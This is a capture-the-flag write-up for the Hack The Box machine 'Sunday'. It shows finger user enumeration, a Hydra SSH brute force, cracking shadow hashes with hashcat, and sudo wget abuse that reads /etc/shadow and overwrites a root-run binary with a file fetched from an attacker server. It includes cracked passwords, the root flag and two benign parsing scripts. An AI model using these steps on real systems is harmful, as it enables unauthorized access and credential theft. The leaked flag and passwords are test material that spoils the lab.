Sunday

Last updated 7 months ago

Enumeration

When I connect to a machine I usually use nmap to scan, but just to learn new tools I will use rustscan to scan all ports, then use nmap to scan the versions and run its default scripts.

$ rustscan 10.10.10.76 --no-nmap
Open 10.10.10.76:79
Open 10.10.10.76:111
Open 10.10.10.76:515
Open 10.10.10.76:6787
Open 10.10.10.76:22022
10.10.10.76 -> [79,111,515,6787,22022]
$ nmap -sC -sV -p 79,111,515,6787,22022 -oA portscan.txt 10.10.10.76
PORT      STATE SERVICE VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=10/14%Time=670D1AC0%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login
...snip..
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

Finger 79/tcp

$ wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar -xzf finger-user-enum-1.0.tar.gz && cd finger-user-enum-1.0
# we need a list of users to brute force
# I will use this one: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
$ ./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76

access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sunny@10.10.10.76: sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
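As an added example (not code from the original writeup or from finger-user-enum), here is a small parser for the finger-user-enum output above that separates real accounts from "???" no-such-user replies and picks out the accounts with a recorded login session, which is how the three SSH users in the next section were identified by eye. The sample is a constructed subset of that output.

```python
import re
from collections import namedtuple

# Constructed subset of the finger-user-enum output above: one multi-match
# query ("admin"), one name that does not exist, and the three real logins.
SAMPLE = """\
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sunny@10.10.10.76: sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
"""

NEVER = re.compile(r"^<\s*(\.\s*){4}>$")  # "< .  .  .  . >" = never logged in
# tty/when/where are None when finger shows no login session for the account
Account = namedtuple("Account", "login name tty when where")


def parse_chunk(chunk):
    """One finger record; None for the column header or a '???' no-such-user reply."""
    chunk = chunk.strip()
    if not chunk or chunk.startswith("Login ") or "<" not in chunk:
        return None
    head, _, tail = chunk.partition("<")
    bracket, _, where = tail.partition(">")
    toks = head.split()
    if NEVER.match("<" + bracket + ">"):
        return Account(toks[0], " ".join(toks[1:]), None, None, None)
    return Account(toks[0], " ".join(toks[1:-1]), toks[-1],
                   " ".join(bracket.split()), where.strip() or None)


def parse_output(text):
    """Map each queried name to the Account records finger returned for it."""
    results = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        query, _, rest = line.partition("@")
        body = rest.partition(": ")[2]
        results[query] = [a for c in body.split("..") if (a := parse_chunk(c))]
    return results


def ssh_logins(text):
    """Accounts with a recorded session: (login, last login, source address)."""
    return [(a.login, a.when, a.where)
            for accts in parse_output(text).values() for a in accts if a.tty]
```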

SSH 22022/tcp

We get 3 users who have logged in with SSH: root, sammy and sunny. So now we try to brute force SSH; we couldn't brute force root and sammy, but we got sunny:sunday.

$ hydra -s 22022 -t 64 -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-14 10:24:32
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1575 login tries (l:1/p:1575), ~25 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 1168 to do in 00:03h, 37 active
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found

Now we are logged in as sunny, but we don't see user.txt (the user flag), which means there are other users we need to look for.

# ssh sunny@sunday.htb -p 22022
$ cat /etc/passwd | grep bash
root:x:0:0:Super-User:/root:/usr/bin/bash
openldap:x:75:75:OpenLDAP User:/:/usr/bin/pfbash
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
# so we need to get sammy's password

Let's keep searching the machine for any odd files. We find a .bash_history, and these are the commands that were run:

su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
# let's see what sudo -l gives sunny
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll
    
$ sudo /root/troll
testing
uid=0(root) gid=0(root)
# we see it prints "testing" and then runs id as root
# we can't edit it or even read it, and even after research we don't know what it is
# so we keep looking at /backup
/backup$ ls -la
-rw-r--r--   1 root     root         319 Dec 19  2021 agent22.backup
-rw-r--r--   1 root     root         319 Dec 19  2021 shadow.backup

#agent22.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

#shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

# they are identical

We have that hash, and to know which hashing algorithm was used we look at the $id prefix: $1$ is MD5 | $2a$ is Blowfish | $2y$ is Blowfish | $5$ is SHA-256 | $6$ is SHA-512 | $y$ is yescrypt

hashcat hash.txt -m 7400 rockyou.txt
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

Now we know sammy's password is cooldude!
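As an added example (not code from the original writeup), this parser classifies shadow entries by their password field and decodes the $id prefix into algorithm, salt, rounds and hashcat mode. It goes a step beyond the prefix table above in that it also handles the rounds=N field, which appears in the root hash leaked further down. The sample is constructed from the shadow.backup entries above plus that root line; the CRYPT_IDS mapping and default of 5000 rounds for the sha-crypt family are assumptions from the crypt(3) and hashcat documentation, not from the page.

```python
import re
from datetime import date, timedelta

# crypt(3) $id$ prefixes listed above and the hashcat mode for each
# (hashcat has no native yescrypt mode, hence None).
CRYPT_IDS = {
    "1": ("md5crypt", 500), "2a": ("bcrypt/Blowfish", 3200), "2y": ("bcrypt/Blowfish", 3200),
    "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800), "y": ("yescrypt", None),
}
# $id$[rounds=N$]salt$hash layout used by md5crypt and the sha-crypt family
HASH_RE = re.compile(r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?"
                     r"(?P<salt>[^$]+)\$(?P<hash>[^$]+)$")

# Constructed sample: two status-only entries and sammy from /backup/shadow.backup
# above, plus the root line that "sudo wget -i /etc/shadow" leaks further down.
SHADOW = """\
openldap:*LK*:::::::
postgres:NP:::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
root:$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553
"""


def parse_hash(field):
    """Classify a shadow password field: locked, no password, or a crypt hash."""
    if field in ("", "NP"):
        return {"status": "no-password"}
    if field[0] in "*!":
        return {"status": "locked"}
    m = HASH_RE.match(field)
    if not m:
        return {"status": "unknown"}
    algo, mode = CRYPT_IDS.get(m["id"], ("unknown", None))
    # sha256crypt/sha512crypt default to 5000 rounds when none is encoded
    rounds = int(m["rounds"]) if m["rounds"] else (5000 if m["id"] in ("5", "6") else None)
    return {"status": "hashed", "algorithm": algo, "hashcat_mode": mode,
            "salt": m["salt"], "rounds": rounds}


def parse_shadow(text):
    """Parse shadow lines; field 3 (lastchg) is days since 1970-01-01."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, pw, lastchg = line.split(":")[:3]
        entry = parse_hash(pw)
        d = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
        entry["lastchg"] = d.isoformat() if d else None
        entries[name] = entry
    return entries
```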

# we login ssh sammy@sunday.htb -p 22022
$ id
uid=100(sammy) gid=10(staff)

$ wc user.txt 
1 1 33 user.txt

For privilege escalation there are many ways to do it, and I will try to write about all of them.

#1 Sudo all

$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
# if we can run ALL, that means we can get a root bash
$ sudo /bin/bash
root@sunday:/home/sammy# wc /root/root.txt 
1 1 33 /root/root.txt

#2 wget

# For a fast win we can read /root/root.txt (the flag)
$ sudo wget -i /root/root.txt
--2024-10-14 15:51:22--  http://456efbda87744c9fe91f7358645a8c08/
# the flag is between the slashes
# we can also read the /etc/shadow file and then crack the root password
$ sudo wget -i /etc/shadow
--2024-10-14 15:41:18--  ftp://root/$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553
           => ‘Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553’
# $5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3 is the hash of root
########
# we can download files with wget
# so what if we do that to /root/troll to overwrite it and get a shell from sunny
# and I think that was the goal of the box
# make a file named "troll", then start a Python file transfer server
# python3 -m http.server 8000
# we need to set up our terminals like this: run sammy's command, then quickly sunny's
sammy$ sudo wget -i http://10.10.16.8:8000/troll -O /root/troll
sunny$ sudo /root/troll
# and we would get a root shell in sunny's terminal

In /root we can read 4 files: root.txt, the flag; troll, the file that sunny can run as root; troll.original, a backup of troll; and overwrite, a script that runs every 5 seconds and changes the troll file back to troll.original.

Note on the Finger step above: Finger is an older protocol that displays information about users on a machine. This can be abused to verify whether a user is valid on that machine. The protocol itself was designed in the 1970s and runs in cleartext. To gather information about users on the machine we could use Metasploit (auxiliary/scanner/finger/finger_users), but I used finger-user-enum by pentestmonkey.

Note on the hashcat step above: now that we know it is SHA-256, we use hashcat. To get the hashcat mode we look at the hashcat example hashes page, but when we search for SHA-256 we don't get a hash shaped like ours, so we search for $5$ and get "sha256crypt $5$, SHA256 (Unix) 2" with mode 7400. For a faster result run it on your bare-metal OS; since I have Windows I ran it there, and it didn't take a second to crack with rockyou.txt.

Note on the privilege escalation section: when we see binaries that we can run as root, we look them up on GTFOBins and see what we can do with them.

References
https://app.hackthebox.com/machines/136
https://www.cyberciti.biz/faq/understanding-etcshadow-file/
https://www.hackthebox.com/achievement/machine/1423703/136